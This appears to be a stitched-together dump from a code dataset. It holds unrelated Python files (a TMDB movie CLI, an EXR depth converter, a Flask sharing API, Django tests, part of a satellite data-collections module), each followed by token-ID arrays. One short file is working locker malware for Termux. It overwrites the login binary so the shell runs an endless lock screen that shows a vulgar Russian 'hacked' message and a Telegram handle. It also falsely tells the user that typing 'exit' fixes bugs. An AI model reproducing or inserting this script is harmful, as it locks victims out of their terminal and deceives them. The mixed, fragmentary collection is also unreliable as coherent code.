def load_movies():
"""
:return: ([dict])
"""
movies = None
with open('data.json', 'r') as fh:
movies = json.load(fh)['movies']
return movies
def write_movies_json(movies):
"""
:param movies: ([dict])
"""
print("{} movies".format(len(movies)))
data = {'movies': movies}
with open('data.json', 'w') as fh:
json.dump(data, fh, indent=4, sort_keys=True)
# Use to add movies in a batch
movies_list = [
['img/oldboy.jpg', 670]
]
# Max 5 request per second
# in fact 40 request every 10 seconds
RATE = 1 / 5
LANGUAGES = ['en', 'fr', 'es', 'de']
custom_style_2 = style_from_dict({
Token.Separator: '#6C6C6C',
Token.QuestionMark: '#FF9D00 bold',
#Token.Selected: '', # default
Token.Selected: '#5F819D',
Token.Pointer: '#FF9D00 bold',
Token.Instruction: '', # default
Token.Answer: '#5F819D bold',
Token.Question: '',
})
if not os.path.isfile('.api_key'):
raise ValueError("You must create a file .api_key with you The Movie DB api key in it")
with open('.api_key', 'r') as fh:
tmdb.API_KEY = fh.read().strip()
def get_movie_infos(movie_id, languages=None):
"""
:param movie_id: (int)
:param languages: ([str])
"""
if languages is None:
languages = LANGUAGES
movie = tmdb.Movies(movie_id)
names, posters = {}, {}
for lang in languages:
movie_infos = movie.info(language=lang)
names[lang] = movie_infos['title']
posters[lang] = movie_infos['poster_path']
names['original_title'] = movie_infos['original_title']
time.sleep(RATE)
return names, posters, movie_infos['original_language']
intentions = {
'Search for a movie': 'search',
'Call The Movie DB api': 'call',
'Add a lang': 'add_lang',
}
intention_prompt = {
'type': 'list',
'name': 'intention',
'message': 'What do you want to do?',
'choices': list(intentions.keys()),
'filter': lambda key: intentions[key]
}
intention = prompt(intention_prompt)['intention']
if intention == 'search':
movies = load_movies()
movie_title_prompt = {
'type': 'input',
'name': 'query',
'message': 'Movie title?',
}
query = prompt(movie_title_prompt)['query']
search = tmdb.Search()
response = search.movie(query=query, style=custom_style_2)
results = {}
for s in search.results:
results[s['title']] = s['id']
if len(results) == 0:
print("No movie found!")
exit(0)
movie_id_prompt = {
'type': 'list',
'name': 'movie_id',
'message': 'Which one?',
'choices': list(results.keys()),
'filter': lambda key: results[key]
}
movie_id = prompt(movie_id_prompt)['movie_id']
names, posters, lang = get_movie_infos(movie_id)
# Get ALternative titles + Get Images
# movie.alternative_titles()
# time.sleep(RATE)
# movie.images()
comix_prompt = {
'type': 'input',
'name': 'image_path',
'message': 'Comixified image name?',
}
image_path = prompt(comix_prompt)['image_path']
if not image_path.startswith('img/'):
image_path = 'img/' + image_path
if not image_path.endswith('.jpg'):
image_path += '.jpg'
movie_obj = Movie(
image_path,
id=movie_id,
names=names,
posters=posters,
lang=lang
)
pprint(movie_obj.__dict__)
movies.append(movie_obj.__dict__)
write_movies_json(movies)
elif intention == 'call':
movies = load_movies()
for idx in range(len(movies_list)):
image_path, movie_id = movies_list[idx]
print(idx, image_path)
names, posters, lang = get_movie_infos(movie_id)
movie_dict = Movie(
image_path,
id=movie_id,
names=names,
posters=posters,
lang=lang
).__dict__
movies.append(movie_dict)
write_movies_json(movies)
elif intention == 'add_lang':
movies = load_movies()
lang_prompt = {
'type': 'input',
'name': 'lang',
'message': 'Which lang?',
}
lang = prompt(lang_prompt)['lang']
for idx in range(len(movies)):
movie_id = movies[idx]['id']
print(idx, movies[idx]['names']['original_title'])
names, posters, _ = get_movie_infos(movie_id, languages=[lang])
movies[idx]['names'][lang] = names[lang]
movies[idx]['posters'][lang] = posters[lang]
write_movies_json(movies)
| [
11748,
28686,
198,
11748,
640,
198,
11748,
33918,
198,
11748,
2638,
13,
16366,
198,
6738,
279,
4798,
1330,
279,
4798,
198,
198,
11748,
256,
9132,
1443,
320,
1154,
355,
256,
9132,
65,
198,
6738,
9485,
818,
29782,
81,
1330,
6152,
11,
39... | 2.253253 | 2,152 |
import os
file = open('/data/data/com.termux/files/usr/bin/locker_service.py', 'w')
file.write("""print(''' _____
RRRRRR. I PPPPPP.
R R. I. P. P
R R. I. P. P
R RRRRR. I. PPPPPP
RR. I. P
R. R. I. P
R. R. I. P
R. R. I. P
''')
while True:
a = input(' Твоя пизда взломана @pkgsearch (telegram)')
""")
file.close()
os.system('chmod +x /data/data/com.termux/files/usr/bin/locker_service.py')
file = open('/data/data/com.termux/files/usr/bin/login', 'w')
file.write('python /data/data/com.termux/files/usr/bin/locker_service.py')
file.close()
print(' Type command -> exit <- to fix bugs')
| [
11748,
28686,
201,
198,
201,
198,
7753,
796,
1280,
10786,
14,
7890,
14,
7890,
14,
785,
13,
4354,
2821,
14,
16624,
14,
14629,
14,
8800,
14,
5354,
263,
62,
15271,
13,
9078,
3256,
705,
86,
11537,
201,
198,
7753,
13,
13564,
7203,
15931,... | 1.539931 | 576 |
# convert to .mat
import OpenEXR, Imath
import os.path
import scipy.io as sio
import numpy as np
depth_save_root = 'E:/GTAVTempCaptures/'
exr_depth_file = 'E:/GTAVTempCaptures/frame9207.exr'
filePrefix = 'py1'
exrFile = OpenEXR.InputFile(exr_depth_file)
dw = exrFile.header()['dataWindow']
size = (dw.max.x - dw.min.x + 1, dw.max.y - dw.min.y + 1)
pt = Imath.PixelType(Imath.PixelType.FLOAT)
depthstr = exrFile.channel('D', pt) # S for stencil and D for depth in channels
depth = np.fromstring(depthstr, dtype = np.float32)
depth.shape = (size[1], size[0]) # Numpy arrays are (row, col)
sio.savemat('{0}/{1}_depth.mat'.format(depth_save_root,filePrefix), {'depth':depth})
exrFile.close()
| [
2,
10385,
284,
764,
6759,
198,
198,
11748,
4946,
6369,
49,
11,
1846,
776,
198,
11748,
28686,
13,
6978,
198,
11748,
629,
541,
88,
13,
952,
355,
264,
952,
198,
11748,
299,
32152,
355,
45941,
198,
198,
18053,
62,
21928,
62,
15763,
796,... | 2.393103 | 290 |
from app.util import RequestUtil, ResponseUtil, JsonUtil
from app.util.AuthUtil import *
@app.route('/share/list', methods=['POST'])
@authorized_required
def share_list_to_group(user):
"""
@api {post} /share/list Share list to multiple groups.
@apiName Share list to multiple groups.
@apiGroup Share
@apiUse AuthorizationTokenHeader
@apiParam {String} list_id: A id of the list to share
@apiParam {String[]} group_id: The list of group id of the group to share
@apiParamExample {json} Request (Example)
{
"list_id": "asdklfaj",
"group_id": ["adlskfjldas", "adsfkdasf"]
}
@apiUse GroupAccessDenied
@apiUse ListDoesNotExist
"""
app.logger.info('User {} Access {}'.format(user, request.full_path))
# Parse the request body
req = RequestUtil.get_request()
group_id = req.get('group_id', None)
list_id = req.get('list_id', None)
# Create a duplicate list in the group
result = MongoUtil.share_list_to_group(user, list_id, group_id)
# If error occurs
if isinstance(result, str):
app.logger.debug(result)
return ResponseUtil.error_response(result)
app.logger.info('User {} Share list {} to Group {}'.format(user, list_id, group_id))
return jsonify(msg='Success'), 200
@app.route('/user/list/<string:base_list_id>/article/<string:article_id>/share/group/<string:group_id>/list'
'/<target_list_id>', methods=['POST'])
@authorized_required
def share_article_to_group(user, base_list_id, article_id, group_id, target_list_id):
"""
@api {post} /user/list/:id/article/:id/share/group/:id/list/:id Share a article to group list.
@apiName Share a article into a group list.
@apiGroup Share
@apiUse AuthorizationTokenHeader
@apiUse UnauthorizedAccessError
@apiUse ResourceDoesNotExist
"""
app.logger.info('User {} Access {}'.format(user, request.full_path))
result = MongoUtil.share_article_to_group_list(user, base_list_id, article_id, group_id, target_list_id)
if isinstance(result, str):
app.logger.debug(result)
return ResponseUtil.error_response(result)
app.logger.info('User {} share article {} to group {}'.format(user, article_id, group_id))
return jsonify(msg='Success')
| [
6738,
598,
13,
22602,
1330,
19390,
18274,
346,
11,
18261,
18274,
346,
11,
449,
1559,
18274,
346,
198,
6738,
598,
13,
22602,
13,
30515,
18274,
346,
1330,
1635,
628,
198,
31,
1324,
13,
38629,
10786,
14,
20077,
14,
4868,
3256,
5050,
28,
... | 2.60452 | 885 |
from bs4 import BeautifulSoup
import requests
from PIL import Image
from io import BytesIO
import os
StartSearch()
| [
6738,
275,
82,
19,
1330,
23762,
50,
10486,
198,
11748,
7007,
198,
6738,
350,
4146,
1330,
7412,
198,
6738,
33245,
1330,
2750,
4879,
9399,
198,
11748,
28686,
628,
198,
10434,
18243,
3419,
198
] | 3.545455 | 33 |
"""
Packages and classes we want to expose to users
"""
from ._utils import get_project_root
__all__ = [
'get_project_root',
]
| [
37811,
198,
11869,
1095,
290,
6097,
356,
765,
284,
15651,
284,
2985,
198,
37811,
198,
6738,
47540,
26791,
1330,
651,
62,
16302,
62,
15763,
198,
198,
834,
439,
834,
796,
685,
198,
220,
220,
220,
705,
1136,
62,
16302,
62,
15763,
3256,
... | 2.933333 | 45 |
from django.test import TestCase
from .models import Profile,BloodStock
# Create your tests here.
class ProfileTestClass(TestCase):
'''
Set Up method that creates instance of Profile Class
Runs before each test
'''
def tearDown(self):
'''
this tearDown method runs after every test.
'''
pass
def test_instance(self):
"""
Testing instance to see if self.profile is instance of class Profile.
"""
self.assertIsInstance(self.profile, Profile)
def test_save_profile(self):
'''
Testing the Save Method on Profile class
'''
self.profile.save_profile()
profiles = Profile.objects.all()
self.assertTrue(len(profiles) > 0)
def test_profile_update(self):
"""
TestCase to check if profile email is updated
"""
self.profile.save_profile()
self.profile.email_update('user2@example.com')
self.assertEqual(self.profile.email, 'user2@example.com')
def test_delete_profile(self):
"""
TestCase to check if method deletes a profile instance
"""
self.profile.save_profile()
self.profile.delete_profile()
profiles = Profile.objects.all()
self.assertTrue(len(profiles) == 0)
class Blood_stockTestClass(TestCase):
'''
Set Up method that creates instance of Blood_stock Class
Runs before each test
'''
def tearDown(self):
'''
this tearDown method runs after every test.
'''
pass
def test_instance(self):
"""
Testing instance to see if self.stock is instance of class Blood_stock.
"""
self.assertIsInstance(self.stock, BloodStock)
def test_save_blood_stock(self):
'''
Testing the Save Method on Profile class
'''
self.stock.save_bloodstock()
stocks = BloodStock.objects.all()
self.assertTrue(len(stocks) > 0)
def test_stock_update(self):
"""
TestCase to check if bloodstock volume is updated
"""
self.stock.save_bloodstock()
self.stock.blood_volume_update('10.00')
self.assertEqual(self.stock.blood_volume, '10.00')
def test_delete_stock(self):
"""
TestCase to check if method deletes a stock instance
"""
self.stock.save_bloodstock()
self.stock.delete_stock()
stocks = BloodStock.objects.all()
self.assertTrue(len(stocks) == 0)
| [
6738,
42625,
14208,
13,
9288,
1330,
6208,
20448,
198,
6738,
764,
27530,
1330,
13118,
11,
21659,
26207,
198,
198,
2,
13610,
534,
5254,
994,
13,
198,
198,
4871,
13118,
14402,
9487,
7,
14402,
20448,
2599,
198,
220,
220,
220,
705,
7061,
1... | 2.393797 | 1,064 |
import pygame, os
from pygame import image
from .drawable import Drawable
from polybius.managers import FRAMES
| [
11748,
12972,
6057,
11,
28686,
198,
6738,
12972,
6057,
1330,
2939,
198,
6738,
764,
19334,
540,
1330,
15315,
540,
198,
6738,
7514,
65,
3754,
13,
805,
10321,
1330,
8782,
29559,
198,
220,
220,
220,
220,
220,
220,
628,
220,
220,
220,
198
... | 2.928571 | 42 |
import math
import pybullet as p
import numpy as np
import transforms3d
import utilities as util
# lap joint task
INITIAL_POS = np.array([0.0, 0.0, 0.24])
INITIAL_ORN = util.mat33_to_quat(np.array([[1, 0, 0], [0, 1, 0], [0, 0, 1]]))
TARGET_POS = np.array([0, 0, 0])
TARGET_ORN = np.array([0, 0, math.pi])
URDF_PATH_TOOL = 'envs/urdf/robotless_lap_joint/tool'
URDF_PATH_TARGET = 'envs/urdf/robotless_lap_joint/task_lap_90deg'
| [
11748,
10688,
198,
11748,
12972,
15065,
1616,
355,
279,
198,
11748,
299,
32152,
355,
45941,
198,
11748,
31408,
18,
67,
198,
11748,
20081,
355,
7736,
198,
198,
2,
14779,
6466,
4876,
198,
1268,
2043,
12576,
62,
37997,
796,
45941,
13,
1874... | 2.234375 | 192 |
#!/usr/bin/env python
# -*- coding:utf-8 -*-
"""
Created on 18/10/12 16:53:03
@author: Changzhi Sun
"""
import sys
sys.path.append("..")
from typing import List, Dict, Any, Optional, Tuple, Set
from collections import defaultdict
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
from antNRE.src.word_encoder import WordCharEncoder
from antNRE.src.seq_encoder import BiLSTMEncoder
from antNRE.src.seq_decoder import SeqSoftmaxDecoder
from antNRE.src.decoder import VanillaSoftmaxDecoder
from antNRE.lib.vocabulary import Vocabulary
from antNRE.lib.util import parse_tag
from antNRE.lib.util import start_of_chunk
from antNRE.lib.util import end_of_chunk
from src.rel_encoder import RelFeatureExtractor
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
2,
532,
9,
12,
19617,
25,
40477,
12,
23,
532,
9,
12,
198,
37811,
198,
41972,
319,
1248,
14,
940,
14,
1065,
1467,
25,
4310,
25,
3070,
198,
198,
31,
9800,
25,
22597,
89,
5303,
3825... | 2.932806 | 253 |
from librus_tricks import exceptions
from librus_tricks.auth import authorizer
from librus_tricks.classes import *
from librus_tricks.core import SynergiaClient
name = 'librus_tricks'
__title__ = 'librus_tricks'
__author__ = 'Backdoorek'
__version__ = '0.7.0'
def create_session(email, password, fetch_first=True, **kwargs):
"""
Używaj tego tylko kiedy hasło do Portal Librus jest takie samo jako do Synergii
:param email: str
:param password: str
:param fetch_first: bool or int
:return:
"""
if fetch_first is True:
user = authorizer(email, password)[0]
session = SynergiaClient(user, synergia_user_passwd=password, **kwargs)
return session
elif fetch_first is False:
users = authorizer(email, password)
sessions = [SynergiaClient(user, synergia_user_passwd=password, **kwargs) for user in users]
return sessions
else:
user = authorizer(email, password)[fetch_first]
session = SynergiaClient(user, synergia_user_passwd=password, **kwargs)
return session | [
6738,
300,
2889,
385,
62,
83,
23706,
1330,
13269,
198,
6738,
300,
2889,
385,
62,
83,
23706,
13,
18439,
1330,
1772,
7509,
198,
6738,
300,
2889,
385,
62,
83,
23706,
13,
37724,
1330,
1635,
198,
6738,
300,
2889,
385,
62,
83,
23706,
13,
... | 2.539192 | 421 |
#!/usr/bin/env python3
# Utility to parse and validate a HAT package
import ctypes
from typing import Any, List, Union
from collections import OrderedDict
from functools import partial
from .hat_file import HATFile, Function, Parameter
from .arg_info import ArgInfo, verify_args
import os
class AttributeDict(OrderedDict):
""" Dictionary that allows entries to be accessed like attributes
"""
__getattr__ = OrderedDict.__getitem__
@property
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
18,
198,
198,
2,
34030,
284,
21136,
290,
26571,
257,
367,
1404,
5301,
198,
198,
11748,
269,
19199,
198,
6738,
19720,
1330,
4377,
11,
7343,
11,
4479,
198,
6738,
17268,
1330,
14230,
1068,
35,... | 3.27972 | 143 |
"""Database connection for the database updater.
The database updater only deletes entries from the files table that exceeded
their timeout after being marked as deleted.
"""
# Python imports
import logging
import datetime
from typing import List, Union, Tuple
# Local imports
from crawler.database import measure_time
from crawler.database import DatabaseConnectionBase
| [
37811,
38105,
4637,
329,
262,
6831,
2325,
729,
13,
198,
198,
464,
6831,
2325,
729,
691,
28128,
274,
12784,
422,
262,
3696,
3084,
326,
20672,
198,
24571,
26827,
706,
852,
7498,
355,
13140,
13,
198,
37811,
628,
198,
2,
11361,
17944,
198... | 4.488095 | 84 |
import numpy as np
import torch
from torch import nn
from itertools import chain
class Controller(nn.Module):
"""
遵循Explainable Neural Computation via Stack Neural Module Networks模型架构
Sec3.1 布局控制器
从net.py传来的参数
controller_kwargs = {
'num_module': len(self.module_names), 值为6
'dim_lstm': self.dim_hidden, 值为1024
'T_ctrl': self.T_ctrl, 默认为3,controller decode length
(对应原论文里的时间步time-step)
'use_gumbel': self.use_gumbel, 默认为False,whether use gumbel softmax for module prob
}
"""
def forward(self, lstm_seq, q_encoding, embed_seq, seq_length_batch):
"""
Input:
lstm_seq: [seq_max_len, batch_size, d]
q_encoding: [batch_size, d]
embed_seq: [seq_max_len, batch_size, e]
seq_length_batch: [batch_size]
"""
device = lstm_seq.device
# 这里使用的是batch_first为False的数据,所以lstm_seq.size(1)才是batch_size
batch_size, seq_max_len = lstm_seq.size(1), lstm_seq.size(0)
seq_length_batch = seq_length_batch.view(1, batch_size).expand(seq_max_len,
batch_size) # [seq_max_len, batch_size]
# 扩展到batch_size个初始化文本参数
c_prev = self.c_init.expand(batch_size, self.dim_lstm) # (batch_size, dim)
# 初始化各项存储列表
module_logit_list = []
module_prob_list = []
c_list, cv_list = [], []
for t in range(self.T_ctrl):
# 将question_embedding按照时间步顺序过线性层
q_i = self.fc_q_list[t](q_encoding)
# 拼接过完线性层W_1^(t)之后的结果和文本参数
# [W_1^(t)q + b_1; c_(t-1)]
q_i_c = torch.cat([q_i, c_prev], dim=1) # [batch_size, 2d]
# 接着过第二个线性层,,获得结果u,输出维度是d
cq_i = self.fc_q_cat_c(q_i_c) # [batch_size, d]
# 获取预测向量,包含各个模块的权重分布,存储在module_prob里
# module_logit是经过softmax前的logits向量
module_logit = self.fc_module_weight(cq_i) # [batch_size, num_module]
module_prob = nn.functional.gumbel_softmax(module_logit, hard=self.use_gumbel) # [batch_size, num_module]
# 这里是u与h_s的哈达玛积
elem_prod = cq_i.unsqueeze(0) * lstm_seq # [seq_max_len, batch_size, dim]
# 输入的问题q有S个单词,每一个单词都算一个双向GRU编码,得到S个cv_(t,s),所以raw_cv_i的每一列都是每一个question的每一个单词对应的logits
raw_cv_i = self.fc_raw_cv(elem_prod).squeeze(2) # [seq_max_len, batch_size]
# 计算有效单词数矩阵,因为每个question的编码序列长短不一,之前padding成最长的问题编码序列长度
# 所以在计算之后的softmax分数时,只能在每个question有的单词之间计算,不能把后面的padding也算上
# 所以无效的padding单元在之后需要设置为-inf,过了softmax后权重就变为0,不会被选择到
invalid_mask = torch.arange(seq_max_len).long().to(device).view(-1, 1).expand_as(raw_cv_i).ge(
seq_length_batch)
# 将无效的padding置为-inf,过了softmax就归零了
raw_cv_i.data.masked_fill_(invalid_mask, -float('inf'))
# 对每一列计算softmax,每一列就成为每一个问题中所有单词对应的权重
cv_i = nn.functional.softmax(raw_cv_i, dim=0).unsqueeze(2) # [seq_max_len, batch_size, 1]
# c_t = sigma_{s=1}^S(cv_(t,s) * h_s))
c_i = torch.sum(lstm_seq * cv_i, dim=0) # [batch_size, d]
# c_i的维度是(batch_size, dim_lstm)
assert c_i.size(0) == batch_size and c_i.size(1) == self.dim_lstm
# 更新文本参数
c_prev = c_i
# add into results 将每个时间步的结果存入列表
module_logit_list.append(module_logit)
module_prob_list.append(module_prob)
c_list.append(c_i)
# cv_list每一个元素的维度是(batch_size, seq_max_len),每一行是单词的权重
cv_list.append(cv_i.squeeze(2).permute(1, 0))
# 最后将存储所有时间步运行结果的堆叠tensor返回
return (torch.stack(module_logit_list), # [T_ctrl, batch_size, num_module]
torch.stack(module_prob_list), # [T_ctrl, batch_size, num_module]
torch.stack(c_list), # [T_ctrl, batch_size, d]
torch.stack(cv_list)) # [T_ctrl, batch_size, seq_max_len]
| [
11748,
299,
32152,
355,
45941,
198,
11748,
28034,
198,
6738,
28034,
1330,
299,
77,
198,
6738,
340,
861,
10141,
1330,
6333,
628,
198,
4871,
22741,
7,
20471,
13,
26796,
2599,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
16268,
223,
11... | 1.382525 | 2,907 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
@author: Tiantian
"""
import torch
import torch.nn as nn
from torch.autograd import Variable
from torch.nn import functional as F
import pdb
from torch.nn.modules import dropout
import itertools
from pytorch_lightning.core.lightning import LightningModule
import numpy as np
from sklearn.metrics import accuracy_score, recall_score
from sklearn.metrics import confusion_matrix
from torch.optim.lr_scheduler import ReduceLROnPlateau
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
18,
198,
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
37811,
198,
31,
9800,
25,
309,
3014,
666,
198,
37811,
198,
11748,
28034,
198,
11748,
28034,
13,
20471,
355,
299,
... | 3.211921 | 151 |
from django.contrib.auth import get_user_model
from core.mixins import TemplateLoginRequiredMixin
User = get_user_model()
| [
6738,
42625,
14208,
13,
3642,
822,
13,
18439,
1330,
651,
62,
7220,
62,
19849,
198,
198,
6738,
4755,
13,
19816,
1040,
1330,
37350,
47790,
37374,
35608,
259,
198,
198,
12982,
796,
651,
62,
7220,
62,
19849,
3419,
628,
628,
628,
628,
198
... | 3.142857 | 42 |
"""
Module defining data collections
"""
import warnings
from enum import Enum, EnumMeta
from typing import Tuple, Optional
from dataclasses import dataclass, field, fields
from aenum import extend_enum
from .config import SHConfig
from .constants import ServiceUrl
from .exceptions import SHDeprecationWarning
from .data_collections_bands import Band, Bands, MetaBands
class _CollectionType:
""" Types of Sentinel Hub data collections
"""
SENTINEL1 = 'Sentinel-1'
SENTINEL2 = 'Sentinel-2'
SENTINEL3 = 'Sentinel-3'
SENTINEL5P = 'Sentinel-5P'
LANDSAT_MSS = 'Landsat 1-5 MSS'
LANDSAT_TM = 'Landsat 4-5 TM'
LANDSAT5 = 'Landsat 5'
LANDSAT_ETM = 'Landsat 7 ETM+'
LANDSAT_OT = 'Landsat 8 OLI and TIRS'
MODIS = 'MODIS'
ENVISAT_MERIS = 'Envisat Meris'
DEM = 'DEM'
BYOC = 'BYOC'
BATCH = 'BATCH'
class _SensorType:
""" Satellite sensors
"""
# pylint: disable=invalid-name
MSI = 'MSI'
OLI_TIRS = 'OLI-TIRS'
TM = 'TM'
ETM = 'ETM+'
MSS = 'MSS'
C_SAR = 'C-SAR'
OLCI = 'OLCI'
SLSTR = 'SLSTR'
TROPOMI = 'TROPOMI'
class _ProcessingLevel:
""" Processing levels
"""
# pylint: disable=invalid-name
L1 = 'L1'
L2 = 'L2'
L1B = 'L1B'
L1C = 'L1C'
L2A = 'L2A'
L3B = 'L3B'
GRD = 'GRD'
class _SwathMode:
""" Swath modes for SAR sensors
"""
# pylint: disable=invalid-name
IW = 'IW'
EW = 'EW'
SM = 'SM'
WV = 'WV'
class _Polarization:
""" SAR polarizations
"""
# pylint: disable=invalid-name
DV = 'DV'
DH = 'DH'
SV = 'SV'
SH = 'SH'
HH = 'HH'
HV = 'HV'
VV = 'VV'
VH = 'VH'
class _Resolution:
""" Product resolution (specific to Sentinel-1 collections)
"""
MEDIUM = 'MEDIUM'
HIGH = 'HIGH'
class OrbitDirection:
""" Orbit directions
"""
ASCENDING = 'ASCENDING'
DESCENDING = 'DESCENDING'
BOTH = 'BOTH'
def _shallow_asdict(dataclass_instance):
""" Returns a dictionary of fields and values, but is not recursive and does not deepcopy like `asdict` """
# This definition needs to be above the class definitions in the file
return {field.name: getattr(dataclass_instance, field.name) for field in fields(dataclass_instance)}
class _DataCollectionMeta(EnumMeta):
""" Meta class that builds DataCollection class enums
"""
def __getattribute__(cls, item, *args, **kwargs):
""" This is executed whenever `DataCollection.SOMETHING` is called
Extended method handles cases where a collection has been renamed. It provides a new collection and raises a
deprecation warning.
"""
if item in _RENAMED_COLLECTIONS:
old_item = item
item = _RENAMED_COLLECTIONS[old_item]
message = f'DataCollection.{old_item} had been renamed into DataCollection.{item}. Please switch to the ' \
'new name as the old one will soon be removed.'
warnings.warn(message, category=SHDeprecationWarning)
return super().__getattribute__(item, *args, **kwargs)
def __call__(cls, value, *args, **kwargs):
""" This is executed whenever `DataCollection('something')` is called
This solves a problem of pickling a custom DataCollection and unpickling it in another process
"""
if isinstance(value, DataCollectionDefinition) and value not in cls._value2member_map_ and value._name:
cls._try_add_data_collection(value._name, value)
return super().__call__(value, *args, **kwargs)
@dataclass(frozen=True)
class DataCollectionDefinition:
""" An immutable definition of a data collection
Check `DataCollection.define` for more info about attributes of this class
"""
# pylint: disable=too-many-instance-attributes
api_id: Optional[str] = None
catalog_id: Optional[str] = None
wfs_id: Optional[str] = None
service_url: Optional[str] = None
collection_type: Optional[str] = None
sensor_type: Optional[str] = None
processing_level: Optional[str] = None
swath_mode: Optional[str] = None
polarization: Optional[str] = None
resolution: Optional[str] = None
orbit_direction: Optional[str] = None
timeliness: Optional[str] = None
bands: Optional[Tuple[Band, ...]] = None
metabands: Optional[Tuple[Band, ...]] = None
collection_id: Optional[str] = None
is_timeless: bool = False
has_cloud_coverage: bool = False
dem_instance: Optional[str] = None
# The following parameter is used to preserve custom DataCollection name during pickling and unpickling process:
_name: Optional[str] = field(default=None, compare=False)
def __post_init__(self):
""" In case a list of bands or metabands has been given this makes sure to cast it into a tuple
"""
if isinstance(self.bands, list):
object.__setattr__(self, 'bands', tuple(self.bands))
if isinstance(self.metabands, list):
object.__setattr__(self, 'metabands', tuple(self.metabands))
def __repr__(self):
""" A nicer representation of parameters that define a data collection
"""
valid_params = {name: value for name, value in _shallow_asdict(self).items() if value is not None}
params_repr = '\n '.join(f'{name}: {value}' for name, value in valid_params.items() if name != '_name')
return f'{self.__class__.__name__}(\n {params_repr}\n)'
def derive(self, **params):
""" Create a new data collection definition from current definition and parameters that override current
parameters
:param params: Any of DataCollectionDefinition attributes
:return: A new data collection definition
:rtype: DataCollectionDefinition
"""
derived_params = _shallow_asdict(self)
derived_params.update(params)
return DataCollectionDefinition(**derived_params)
_RENAMED_COLLECTIONS = { # DataCollection renaming for backwards-compatibility
'LANDSAT15_L1': 'LANDSAT_MSS_L1',
'LANDSAT45_L1': 'LANDSAT_TM_L1',
'LANDSAT45_L2': 'LANDSAT_TM_L2',
'LANDSAT7_L1': 'LANDSAT_ETM_L1',
'LANDSAT7_L2': 'LANDSAT_ETM_L2',
'LANDSAT8': 'LANDSAT_OT_L1',
'LANDSAT8_L1': 'LANDSAT_OT_L1',
'LANDSAT8_L2': 'LANDSAT_OT_L2'
}
class DataCollection(Enum, metaclass=_DataCollectionMeta):
""" An enum class for data collections
It contains a number of predefined data collections, which are the most commonly used with Sentinel Hub service.
Additionally it also allows defining new data collections by specifying data collection parameters relevant for
the service. Check `DataCollection.define` and similar methods for more.
"""
SENTINEL2_L1C = DataCollectionDefinition(
api_id='sentinel-2-l1c',
catalog_id='sentinel-2-l1c',
wfs_id='DSS1',
service_url=ServiceUrl.MAIN,
collection_type=_CollectionType.SENTINEL2,
sensor_type=_SensorType.MSI,
processing_level=_ProcessingLevel.L1C,
bands=Bands.SENTINEL2_L1C,
metabands=MetaBands.SENTINEL2_L1C,
has_cloud_coverage=True,
)
SENTINEL2_L2A = DataCollectionDefinition(
api_id='sentinel-2-l2a',
catalog_id='sentinel-2-l2a',
wfs_id='DSS2',
service_url=ServiceUrl.MAIN,
collection_type=_CollectionType.SENTINEL2,
sensor_type=_SensorType.MSI,
processing_level=_ProcessingLevel.L2A,
bands=Bands.SENTINEL2_L2A,
metabands=MetaBands.SENTINEL2_L2A,
has_cloud_coverage=True,
)
SENTINEL1 = DataCollectionDefinition(
api_id='sentinel-1-grd',
catalog_id='sentinel-1-grd',
wfs_id='DSS3',
service_url=ServiceUrl.MAIN,
collection_type=_CollectionType.SENTINEL1,
sensor_type=_SensorType.C_SAR,
processing_level=_ProcessingLevel.GRD,
orbit_direction=OrbitDirection.BOTH,
metabands=MetaBands.SENTINEL1,
)
SENTINEL1_IW = SENTINEL1.derive(
swath_mode=_SwathMode.IW,
polarization=_Polarization.DV,
resolution=_Resolution.HIGH,
bands=Bands.SENTINEL1_IW,
)
SENTINEL1_IW_ASC = SENTINEL1_IW.derive(
orbit_direction=OrbitDirection.ASCENDING,
)
SENTINEL1_IW_DES = SENTINEL1_IW.derive(
orbit_direction=OrbitDirection.DESCENDING,
)
SENTINEL1_EW = SENTINEL1.derive(
swath_mode=_SwathMode.EW,
polarization=_Polarization.DH,
resolution=_Resolution.MEDIUM,
bands=Bands.SENTINEL1_EW,
)
SENTINEL1_EW_ASC = SENTINEL1_EW.derive(
orbit_direction=OrbitDirection.ASCENDING,
)
SENTINEL1_EW_DES = SENTINEL1_EW.derive(
orbit_direction=OrbitDirection.DESCENDING,
)
SENTINEL1_EW_SH = SENTINEL1_EW.derive(
polarization=_Polarization.SH,
bands=Bands.SENTINEL1_EW_SH,
)
SENTINEL1_EW_SH_ASC = SENTINEL1_EW_SH.derive(
orbit_direction=OrbitDirection.ASCENDING,
)
SENTINEL1_EW_SH_DES = SENTINEL1_EW_SH.derive(
orbit_direction=OrbitDirection.DESCENDING,
)
DEM = DataCollectionDefinition(
api_id='dem',
service_url=ServiceUrl.MAIN,
collection_type=_CollectionType.DEM,
bands=Bands.DEM,
metabands=MetaBands.DEM,
is_timeless=True,
)
DEM_MAPZEN = DEM.derive(
dem_instance='MAPZEN',
)
DEM_COPERNICUS_30 = DEM.derive(
dem_instance='COPERNICUS_30',
)
DEM_COPERNICUS_90 = DEM.derive(
dem_instance='COPERNICUS_90',
)
MODIS = DataCollectionDefinition(
api_id='modis',
catalog_id='modis',
wfs_id='DSS5',
service_url=ServiceUrl.USWEST,
collection_type=_CollectionType.MODIS,
bands=Bands.MODIS,
metabands=MetaBands.MODIS,
)
LANDSAT_MSS_L1 = DataCollectionDefinition(
api_id='landsat-mss-l1',
catalog_id='landsat-mss-l1',
wfs_id='DSS14',
service_url=ServiceUrl.USWEST,
collection_type=_CollectionType.LANDSAT_MSS,
sensor_type=_SensorType.MSS,
processing_level=_ProcessingLevel.L1,
bands=Bands.LANDSAT_MSS_L1,
metabands=MetaBands.LANDSAT_MSS_L1,
has_cloud_coverage=True,
)
LANDSAT_TM_L1 = DataCollectionDefinition(
api_id='landsat-tm-l1',
catalog_id='landsat-tm-l1',
wfs_id='DSS15',
service_url=ServiceUrl.USWEST,
collection_type=_CollectionType.LANDSAT_TM,
sensor_type=_SensorType.TM,
processing_level=_ProcessingLevel.L1,
bands=Bands.LANDSAT_TM_L1,
metabands=MetaBands.LANDSAT_TM_L1,
has_cloud_coverage=True,
)
LANDSAT_TM_L2 = LANDSAT_TM_L1.derive(
api_id='landsat-tm-l2',
catalog_id='landsat-tm-l2',
wfs_id='DSS16',
